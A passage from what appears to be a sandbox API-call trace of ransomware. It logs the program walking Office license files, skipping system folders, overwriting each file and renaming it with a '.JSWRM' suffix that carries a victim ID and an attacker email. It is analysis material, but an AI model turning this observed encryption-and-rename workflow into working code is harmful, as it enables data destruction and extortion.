[0103.985] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10635) returned 1 [0103.985] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0103.985] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0104.017] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.017] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0104.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.018] CloseHandle (hObject=0x45c) returned 1 [0104.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0104.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0104.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0104.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0104.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0104.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0104.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.018] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0104.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0104.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0104.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0104.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0104.020] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4a4b257, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4a4b257, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4b09e82, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6760, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="MONDOR~4.XRM")) returned 1 [0104.020] lstrcmpiW (lpString1="MondoR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0104.020] lstrcmpiW (lpString1="MondoR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0104.020] lstrcmpiW (lpString1="MondoR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0104.020] lstrcmpiW (lpString1="MondoR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned -1 [0104.020] lstrcmpiW (lpString1="MondoR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.020] lstrcmpiW (lpString1="MondoR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.020] lstrcmpiW (lpString1="MondoR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.020] lstrcmpiW (lpString1="MondoR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.020] lstrcmpiW (lpString1="MondoR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.020] lstrcmpiW (lpString1="MondoR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned -1 [0104.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0104.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_OEM_Perp-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0104.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0104.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_OEM_Perp-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240fc0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0104.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0104.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0104.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_OEM_Perp-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0104.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0104.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_OEM_Perp-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x2412b8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0104.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0104.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0104.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0104.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0104.021] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.021] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=26464) returned 1 [0104.021] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6760) returned 0x24c1d0 [0104.021] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6760, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x6760, lpOverlapped=0x0) returned 1 [0104.025] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.025] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6760, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x6760, lpOverlapped=0x0) returned 1 [0104.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.025] CloseHandle (hObject=0x45c) returned 1 [0104.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0104.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0104.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0104.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0104.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0104.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0104.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.026] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0104.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0104.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0104.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0104.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0104.027] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4a25005, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4a25005, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4ae3c90, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d3e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="MONDOR~3.XRM")) returned 1 [0104.027] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.027] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.027] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.027] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.027] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.027] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.027] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.027] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.027] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.027] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0104.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0104.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0104.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0104.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241330, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0104.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0104.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0104.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0104.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0104.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0104.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0104.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0104.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0104.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0104.027] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.028] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11582) returned 1 [0104.028] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d30) returned 0x24c1d0 [0104.028] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d30, lpOverlapped=0x0) returned 1 [0104.030] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.030] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d30, lpOverlapped=0x0) returned 1 [0104.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.030] CloseHandle (hObject=0x45c) returned 1 [0104.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0104.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0104.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0104.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0104.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0104.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0104.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.031] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0104.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0104.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0104.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0104.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0104.032] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4f82560, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4f82560, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe50672e1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dd7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="MO05DE~1.XRM")) returned 1 [0104.032] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0104.032] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0104.032] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0104.032] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned -1 [0104.032] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0104.032] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0104.032] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0104.032] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.032] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0104.032] lstrcmpiW (lpString1="MondoR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned -1 [0104.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0104.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0104.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0104.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241290, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0104.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0104.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0104.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0104.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0104.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x240fe8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0104.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0104.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0104.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0104.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 